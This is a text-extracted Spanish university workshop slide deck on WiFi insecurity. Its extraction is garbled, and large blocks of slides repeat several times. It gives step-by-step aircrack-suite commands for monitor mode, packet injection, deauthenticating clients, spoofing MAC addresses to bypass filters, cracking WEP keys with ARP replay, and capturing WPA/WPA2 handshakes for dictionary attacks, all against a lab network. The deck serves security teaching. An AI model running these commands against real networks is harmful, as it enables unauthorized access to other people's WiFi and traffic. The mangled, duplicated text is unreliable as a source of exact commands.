httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6494
Queacute aprendimos
VI F ll d i ioacute WLAN
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6594
VI- Fallas de encripcioacuten WLAN
bull La mejor manera de proteger los datos en el airees por medio de encriptacioacuten
bull Tres protocolos de encriptacioacuten ndash Wired Equivalent Privacy (WEP)
ndash WiFi Protected Access (WPA)
ndash WiFi Protected Access v2 (WPAv2)
Wi d E i l t P i
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6694
Wired Equivalent Privacy
bull Vulnerado desde el 2000
WEP
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6794
WEP
bull RC4 cifrado por corriente (stream cipher )
bull Llave (key) conocida por el cliente y el AP
bull
Para no repetir la Llave utiliza los IV ndash Iniatialization Vector (IV) de 24 bits
bull El problema es el tamantildeo limitado de los IV
WEP I i i d l aacuteli i
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6894
WEP ndash Iniciando el anaacutelisis
bull Teclear ifconfig wlan0 up bull Teclear airmon-ng start wlan0
WEP Preparando la captura
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6994
WEP - Preparando la captura
bullTeclear airodump-ng mon0 para detectar el AP
bull Teclear airodump-ng - -bssid aabbccddeeff - -
chanell 11 - -write WEPCrackingDemo mon0
WEP Capturando los paquetes
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7094
WEP ndash Capturando los paquetes
WEP Detectando al cliente
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7194
WEP ndash Detectando al cliente
bull
Detectamos cuando un cliente se conecta a lared utilizando WEP
WEP Archivos generados
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7294
WEP ndash Archivos generados
bull
Si tecleamos ls veremos que se estaacuten creandolos archivos de captura de traacutefico
WEP Creando maacutes traacutefico
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7394
WEP ndash Creando maacutes traacutefico
bull
Necesitamos generar traacutefico para obtener maacutescapturas en Data
bull Se utilizaraacuten paquetes ARP para generar traacutefico
bull Teclear aireplay-ng -3 ndash b aabbccddeeff ndash hgghhiijjkkll mon0
WEP Creando maacutes traacutefico
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7494
WEP ndash Creando maacutes traacutefico
bullaireplay comenzaraacute a generar traacutefico el cual severaacute reflejado en la consola del airodump
WEP Encontrando la llave
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7594
WEP - Encontrando la llave
bull
Teclear aircrack-ng WEPCrackingDemo-01cap
WEP Encontrando la llave
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7694
WEP ndash Encontrando la llave
bull
Paquetes requeridos gt= 100 K
Tiempo de un video
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7794
Tiempo de un video
bull
Mientras esperamos veamos un video
Seguridad en redes Wi-Fi (intypedia)
bull Intypedia es una enciclopedia online de
seguridad de informacioacuten
WEP Llave Encontrada
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7894
WEP ndash Llave Encontrada
WPAWPA2
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7994
WPAWPA2
bull WPA utiliza el algoritmo Temporal Key Integrity Protocol ( TKIP con RC4)
bull WPA2 utiliza el algoritmo AES-CCMP (Counter Cipher Mode Protocol)
bull Tanto WPA como WPA2 soportan los siguientesmecanismos de autenticacioacuten ndash EAP ndash Servidores RADIUS ndash
Pre-Shared Key (PSK)
bull Vulnerables a ataques de diccionario
WPAWPA2 Handshake
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8094
WPAWPA2 - Handshake
WPAWPA2 ndash El ataque
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8194
WPAWPA2 ndash El ataque
WPAWPA2 ndash Iniciando el
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8294
anaacutelisis
bull
Teclear airodump-ng ndash bssid aabbccddeeff ndash channel 11 --write WPACrackingDemo mon0
WPAWPA2 ndash Esperando al
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8394
cliente
bull
Podemos esperar a que se conecte un cliente oforzamos la desconexioacuten
bull WPA Handshake
WPAWPA2 ndash Preparando el
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8494
diccionario
bull
Teclearlspentestpasswordswordlistdarkc0delst
WPAWPA2 ndash Usando el
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8594
diccionario
bull Teclear aircrack-ng WPACrackingDemo-01cap ndash
w pentestpasswordswordlistsdarkc0delst
WPAWPA2 ndash Obteniendo la
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8694
llave
bull
Se utilizan las combinaciones de frases deldiccionario
Conectaacutendonos con WEP
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8794
Conectaacutendonos con WEP
bull
Teclear iwconfig wlan essid ldquoWireless Labrdquokey abcdefabcdefabcdefabcdef12
bull Para comprobar tecleamos iwconfig wlan0
Conectaacutendonos con WPA
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8894
Conectaacutendonos con WPA
bull
Iwconfig no soporta WPAWPA2bull Creamos un archivo de configuracioacuten llamado
wpa-suppconf
bull Teclear wpa_passphrase ldquoWirelessLabpassword gt
etcwpa_supplicantwpa_supplicantconf
Conectaacutendonos con WPA
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8994
Conectaacutendonos con WPA
Conectaacutendonos con WPA
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9094
Conectaacutendonos con WPA
bull
Teclear wpa_supplicant ndash Dwext ndash iwlan0 ndash c bull etcwpa_supplicantwpa_supplicantconf
Utilizando el cliente DHCP
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9194
Utilizando el cliente DHCP
bull
Podemos solicitar una direccioacuten viacutea DHCPtecleando dhclient3 wlan0
Queacute aprendimos
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9294
Queacute aprendimos
Gracias
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9394
Gracias
Dr Eduardo Ceh Varela
eduardocehutmetropolitanaedumx
Referencias
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9494
Referencias
bull
httpwwwbacktrack-linuxorgforumsshowthreadphpt=1133 bull httpwwwgenbetadevcomseguridad-
informaticatipos-de-criptografia-simetrica-asimetrica-e-hibrida
bull httpsecuritystackexchangecomquestions17434how-wep-wireless-security-works
bull httpwwwelladodelmalcom200808atacar-wpawpa2-psk-parte-i-de-ivhtml
bull CASP Study Guidebull BackTrack 5 Wireless Beginners
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4694
Viendo paquetes no encriptados
bull
Encontrar el canal del Access Pointbull Teclear airodump-ng --bssid aabbccddeeff mon0
(MAC del AP)
bull Anotar el canal (ejemplo 11)bull Oprimir Ctrl+C para detener la ejecucioacuten
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4794
Ligando al Canal
bull Ligar nuestra tarjeta de red al canal del APbull Teclear iwconfig mon0 channel 11
bull Confirmar tecleando iwconfig mon0
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4894
Sniffing de paquetes
bull Aplicar el siguiente filtro en Wireshark en laseccioacuten Filter
ndash (wlanbssid == aabbccddeeff) ampamp
(wlanfctype_subtype == 0x20)
ndash Tipos
bull Management (wlanfctype == 0)
bull Control (wlanfctype == 1)
bull Data (wlanfctype == 2)
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4994
Filtros
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5094
Captura Filtrada
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5194
Inyectando paquetes a la red
bull Modifica el filtro en el Wireshark para que sea(wlanbssid == aabbccddeeff) ampamp
(wlanfctype_subtype==0x08)
bull Ejecuta el comandoaireplay-ng -9 ndashe ldquo Wireless Labrdquo ndash a
aabbccddeeff mon0
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5294
Viendo los paquetes inyectados
bull Regresa al Wireshark debes de ver muchospaquetes
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5394
Queacute apredimos
V- Saltaacutendose la autenticacioacuten
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5494
V Saltaacutendose la autenticacioacuten
WLAN
bull Las WLAN tienen esquemas de autenticacioacutendeacutebiles
bull Se veraacuten diferentes esquemas y coacutemo saltarlos
ndash Descubrimiento de SSIDs
ndash Saltaacutendose filtros por MAC
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5594
SSIDs Ocultos
bull Con Wireshark podemos ver el SSID
l
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5694
SSID Ocultos
eacute i i
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5794
Teacutecnica Pasiva
bull Esperar a que se conecte alguacuten cliente a la WLAN
eacute i i
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5894
Teacutecnica Activa
bull Enviacuteo de paquetes de Deauthenticationbull Teclear aireplay-ng -0 5 ndash a aabbccddeeff
mon0
M i Wi h k
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5994
Monitoreo con Wireshark
M i Wi h k
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6094
Monitoreo con Wireshark
bull Utilizar el filtro(wlanbssid == aabbccddeeff) ampamp
(wlanfctype_subtype == 0x08)
Fil d MAC
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6194
Filtrado por MAC
bull Solo la MAC Address permitidas se conectan alared
E t d l MAC
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6294
Encontrando la MAC
bull
Teclear airodump-ng ndash c 11 ndash a --bssid aabbccddeeff mon0
bull Anotamos la MAC del cliente
C biaacute d l MAC
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6394
Cambiaacutendonos la MAC
bull Teclear ifconfig wlan0 downbull Teclear macchanger ndash m gghhiijjkkll wlan0
bull Teclear ifconfig wlan0 up
Q eacute di
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6494
Queacute aprendimos
VI F ll d i ioacute WLAN
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6594
VI- Fallas de encripcioacuten WLAN
bull La mejor manera de proteger los datos en el airees por medio de encriptacioacuten
bull Tres protocolos de encriptacioacuten ndash Wired Equivalent Privacy (WEP)
ndash WiFi Protected Access (WPA)
ndash WiFi Protected Access v2 (WPAv2)
Wi d E i l t P i
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6694
Wired Equivalent Privacy
bull Vulnerado desde el 2000
WEP
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6794
WEP
bull RC4 cifrado por corriente (stream cipher )
bull Llave (key) conocida por el cliente y el AP
bull
Para no repetir la Llave utiliza los IV ndash Iniatialization Vector (IV) de 24 bits
bull El problema es el tamantildeo limitado de los IV
WEP I i i d l aacuteli i
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6894
WEP ndash Iniciando el anaacutelisis
bull Teclear ifconfig wlan0 up bull Teclear airmon-ng start wlan0
WEP Preparando la captura
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6994
WEP - Preparando la captura
bullTeclear airodump-ng mon0 para detectar el AP
bull Teclear airodump-ng - -bssid aabbccddeeff - -
chanell 11 - -write WEPCrackingDemo mon0
WEP Capturando los paquetes
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7094
WEP ndash Capturando los paquetes
WEP Detectando al cliente
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7194
WEP ndash Detectando al cliente
bull
Detectamos cuando un cliente se conecta a lared utilizando WEP
WEP Archivos generados
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7294
WEP ndash Archivos generados
bull
Si tecleamos ls veremos que se estaacuten creandolos archivos de captura de traacutefico
WEP Creando maacutes traacutefico
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7394
WEP ndash Creando maacutes traacutefico
bull
Necesitamos generar traacutefico para obtener maacutescapturas en Data
bull Se utilizaraacuten paquetes ARP para generar traacutefico
bull Teclear aireplay-ng -3 ndash b aabbccddeeff ndash hgghhiijjkkll mon0
WEP Creando maacutes traacutefico
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7494
WEP ndash Creando maacutes traacutefico
bullaireplay comenzaraacute a generar traacutefico el cual severaacute reflejado en la consola del airodump
WEP Encontrando la llave
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7594
WEP - Encontrando la llave
bull
Teclear aircrack-ng WEPCrackingDemo-01cap
WEP Encontrando la llave
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7694
WEP ndash Encontrando la llave
bull
Paquetes requeridos gt= 100 K
Tiempo de un video
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7794
Tiempo de un video
bull
Mientras esperamos veamos un video
Seguridad en redes Wi-Fi (intypedia)
bull Intypedia es una enciclopedia online de
seguridad de informacioacuten
WEP Llave Encontrada
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7894
WEP ndash Llave Encontrada
WPAWPA2
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7994
WPAWPA2
bull WPA utiliza el algoritmo Temporal Key Integrity Protocol ( TKIP con RC4)
bull WPA2 utiliza el algoritmo AES-CCMP (Counter Cipher Mode Protocol)
bull Tanto WPA como WPA2 soportan los siguientesmecanismos de autenticacioacuten ndash EAP ndash Servidores RADIUS ndash
Pre-Shared Key (PSK)
bull Vulnerables a ataques de diccionario
WPAWPA2 Handshake
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8094
WPAWPA2 - Handshake
WPAWPA2 ndash El ataque
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8194
WPAWPA2 ndash El ataque
WPAWPA2 ndash Iniciando el
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8294
anaacutelisis
bull
Teclear airodump-ng ndash bssid aabbccddeeff ndash channel 11 --write WPACrackingDemo mon0
WPAWPA2 ndash Esperando al
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8394
cliente
bull
Podemos esperar a que se conecte un cliente oforzamos la desconexioacuten
bull WPA Handshake
WPAWPA2 ndash Preparando el
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8494
diccionario
bull
Teclearlspentestpasswordswordlistdarkc0delst
WPAWPA2 ndash Usando el
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8594
diccionario
bull Teclear aircrack-ng WPACrackingDemo-01cap ndash
w pentestpasswordswordlistsdarkc0delst
WPAWPA2 ndash Obteniendo la
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8694
llave
bull
Se utilizan las combinaciones de frases deldiccionario
Conectaacutendonos con WEP
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8794
Conectaacutendonos con WEP
bull
Teclear iwconfig wlan essid ldquoWireless Labrdquokey abcdefabcdefabcdefabcdef12
bull Para comprobar tecleamos iwconfig wlan0
Conectaacutendonos con WPA
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8894
Conectaacutendonos con WPA
bull
Iwconfig no soporta WPAWPA2bull Creamos un archivo de configuracioacuten llamado
wpa-suppconf
bull Teclear wpa_passphrase ldquoWirelessLabpassword gt
etcwpa_supplicantwpa_supplicantconf
Conectaacutendonos con WPA
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8994
Conectaacutendonos con WPA
Conectaacutendonos con WPA
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9094
Conectaacutendonos con WPA
bull
Teclear wpa_supplicant ndash Dwext ndash iwlan0 ndash c bull etcwpa_supplicantwpa_supplicantconf
Utilizando el cliente DHCP
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9194
Utilizando el cliente DHCP
bull
Podemos solicitar una direccioacuten viacutea DHCPtecleando dhclient3 wlan0
Queacute aprendimos
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9294
Queacute aprendimos
Gracias
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9394
Gracias
Dr Eduardo Ceh Varela
eduardocehutmetropolitanaedumx
Referencias
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9494
Referencias
bull
httpwwwbacktrack-linuxorgforumsshowthreadphpt=1133 bull httpwwwgenbetadevcomseguridad-
informaticatipos-de-criptografia-simetrica-asimetrica-e-hibrida
bull httpsecuritystackexchangecomquestions17434how-wep-wireless-security-works
bull httpwwwelladodelmalcom200808atacar-wpawpa2-psk-parte-i-de-ivhtml
bull CASP Study Guidebull BackTrack 5 Wireless Beginners
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4794
Ligando al Canal
bull Ligar nuestra tarjeta de red al canal del APbull Teclear iwconfig mon0 channel 11
bull Confirmar tecleando iwconfig mon0
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4894
Sniffing de paquetes
bull Aplicar el siguiente filtro en Wireshark en laseccioacuten Filter
ndash (wlanbssid == aabbccddeeff) ampamp
(wlanfctype_subtype == 0x20)
ndash Tipos
bull Management (wlanfctype == 0)
bull Control (wlanfctype == 1)
bull Data (wlanfctype == 2)
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4994
Filtros
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5094
Captura Filtrada
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5194
Inyectando paquetes a la red
bull Modifica el filtro en el Wireshark para que sea(wlanbssid == aabbccddeeff) ampamp
(wlanfctype_subtype==0x08)
bull Ejecuta el comandoaireplay-ng -9 ndashe ldquo Wireless Labrdquo ndash a
aabbccddeeff mon0
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5294
Viendo los paquetes inyectados
bull Regresa al Wireshark debes de ver muchospaquetes
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5394
Queacute apredimos
V- Saltaacutendose la autenticacioacuten
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5494
V Saltaacutendose la autenticacioacuten
WLAN
bull Las WLAN tienen esquemas de autenticacioacutendeacutebiles
bull Se veraacuten diferentes esquemas y coacutemo saltarlos
ndash Descubrimiento de SSIDs
ndash Saltaacutendose filtros por MAC
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5594
SSIDs Ocultos
bull Con Wireshark podemos ver el SSID
l
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5694
SSID Ocultos
eacute i i
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5794
Teacutecnica Pasiva
bull Esperar a que se conecte alguacuten cliente a la WLAN
eacute i i
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5894
Teacutecnica Activa
bull Enviacuteo de paquetes de Deauthenticationbull Teclear aireplay-ng -0 5 ndash a aabbccddeeff
mon0
M i Wi h k
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5994
Monitoreo con Wireshark
M i Wi h k
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6094
Monitoreo con Wireshark
bull Utilizar el filtro(wlanbssid == aabbccddeeff) ampamp
(wlanfctype_subtype == 0x08)
Fil d MAC
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6194
Filtrado por MAC
bull Solo la MAC Address permitidas se conectan alared
E t d l MAC
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6294
Encontrando la MAC
bull
Teclear airodump-ng ndash c 11 ndash a --bssid aabbccddeeff mon0
bull Anotamos la MAC del cliente
C biaacute d l MAC
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6394
Cambiaacutendonos la MAC
bull Teclear ifconfig wlan0 downbull Teclear macchanger ndash m gghhiijjkkll wlan0
bull Teclear ifconfig wlan0 up
Q eacute di
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6494
Queacute aprendimos
VI F ll d i ioacute WLAN
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6594
VI- Fallas de encripcioacuten WLAN
bull La mejor manera de proteger los datos en el airees por medio de encriptacioacuten
bull Tres protocolos de encriptacioacuten ndash Wired Equivalent Privacy (WEP)
ndash WiFi Protected Access (WPA)
ndash WiFi Protected Access v2 (WPAv2)
Wi d E i l t P i
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6694
Wired Equivalent Privacy
bull Vulnerado desde el 2000
WEP
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6794
WEP
bull RC4 cifrado por corriente (stream cipher )
bull Llave (key) conocida por el cliente y el AP
bull
Para no repetir la Llave utiliza los IV ndash Iniatialization Vector (IV) de 24 bits
bull El problema es el tamantildeo limitado de los IV
WEP I i i d l aacuteli i
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6894
WEP ndash Iniciando el anaacutelisis
bull Teclear ifconfig wlan0 up bull Teclear airmon-ng start wlan0
WEP Preparando la captura
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6994
WEP - Preparando la captura
bullTeclear airodump-ng mon0 para detectar el AP
bull Teclear airodump-ng - -bssid aabbccddeeff - -
chanell 11 - -write WEPCrackingDemo mon0
WEP Capturando los paquetes
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7094
WEP ndash Capturando los paquetes
WEP Detectando al cliente
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7194
WEP ndash Detectando al cliente
bull
Detectamos cuando un cliente se conecta a lared utilizando WEP
WEP Archivos generados
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7294
WEP ndash Archivos generados
bull
Si tecleamos ls veremos que se estaacuten creandolos archivos de captura de traacutefico
WEP Creando maacutes traacutefico
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7394
WEP ndash Creando maacutes traacutefico
bull
Necesitamos generar traacutefico para obtener maacutescapturas en Data
bull Se utilizaraacuten paquetes ARP para generar traacutefico
bull Teclear aireplay-ng -3 ndash b aabbccddeeff ndash hgghhiijjkkll mon0
WEP Creando maacutes traacutefico
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7494
WEP ndash Creando maacutes traacutefico
bullaireplay comenzaraacute a generar traacutefico el cual severaacute reflejado en la consola del airodump
WEP Encontrando la llave
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7594
WEP - Encontrando la llave
bull
Teclear aircrack-ng WEPCrackingDemo-01cap
WEP Encontrando la llave
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7694
WEP ndash Encontrando la llave
bull
Paquetes requeridos gt= 100 K
Tiempo de un video
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7794
Tiempo de un video
bull
Mientras esperamos veamos un video
Seguridad en redes Wi-Fi (intypedia)
bull Intypedia es una enciclopedia online de
seguridad de informacioacuten
WEP Llave Encontrada
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7894
WEP ndash Llave Encontrada
WPAWPA2
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7994
WPAWPA2
bull WPA utiliza el algoritmo Temporal Key Integrity Protocol ( TKIP con RC4)
bull WPA2 utiliza el algoritmo AES-CCMP (Counter Cipher Mode Protocol)
bull Tanto WPA como WPA2 soportan los siguientesmecanismos de autenticacioacuten ndash EAP ndash Servidores RADIUS ndash
Pre-Shared Key (PSK)
bull Vulnerables a ataques de diccionario
WPAWPA2 Handshake
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8094
WPAWPA2 - Handshake
WPAWPA2 ndash El ataque
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8194
WPAWPA2 ndash El ataque
WPAWPA2 ndash Iniciando el
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8294
anaacutelisis
bull
Teclear airodump-ng ndash bssid aabbccddeeff ndash channel 11 --write WPACrackingDemo mon0
WPAWPA2 ndash Esperando al
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8394
cliente
bull
Podemos esperar a que se conecte un cliente oforzamos la desconexioacuten
bull WPA Handshake
WPAWPA2 ndash Preparando el
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8494
diccionario
bull
Teclearlspentestpasswordswordlistdarkc0delst
WPAWPA2 ndash Usando el
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8594
diccionario
bull Teclear aircrack-ng WPACrackingDemo-01cap ndash
w pentestpasswordswordlistsdarkc0delst
WPAWPA2 ndash Obteniendo la
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8694
llave
bull
Se utilizan las combinaciones de frases deldiccionario
Conectaacutendonos con WEP
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8794
Conectaacutendonos con WEP
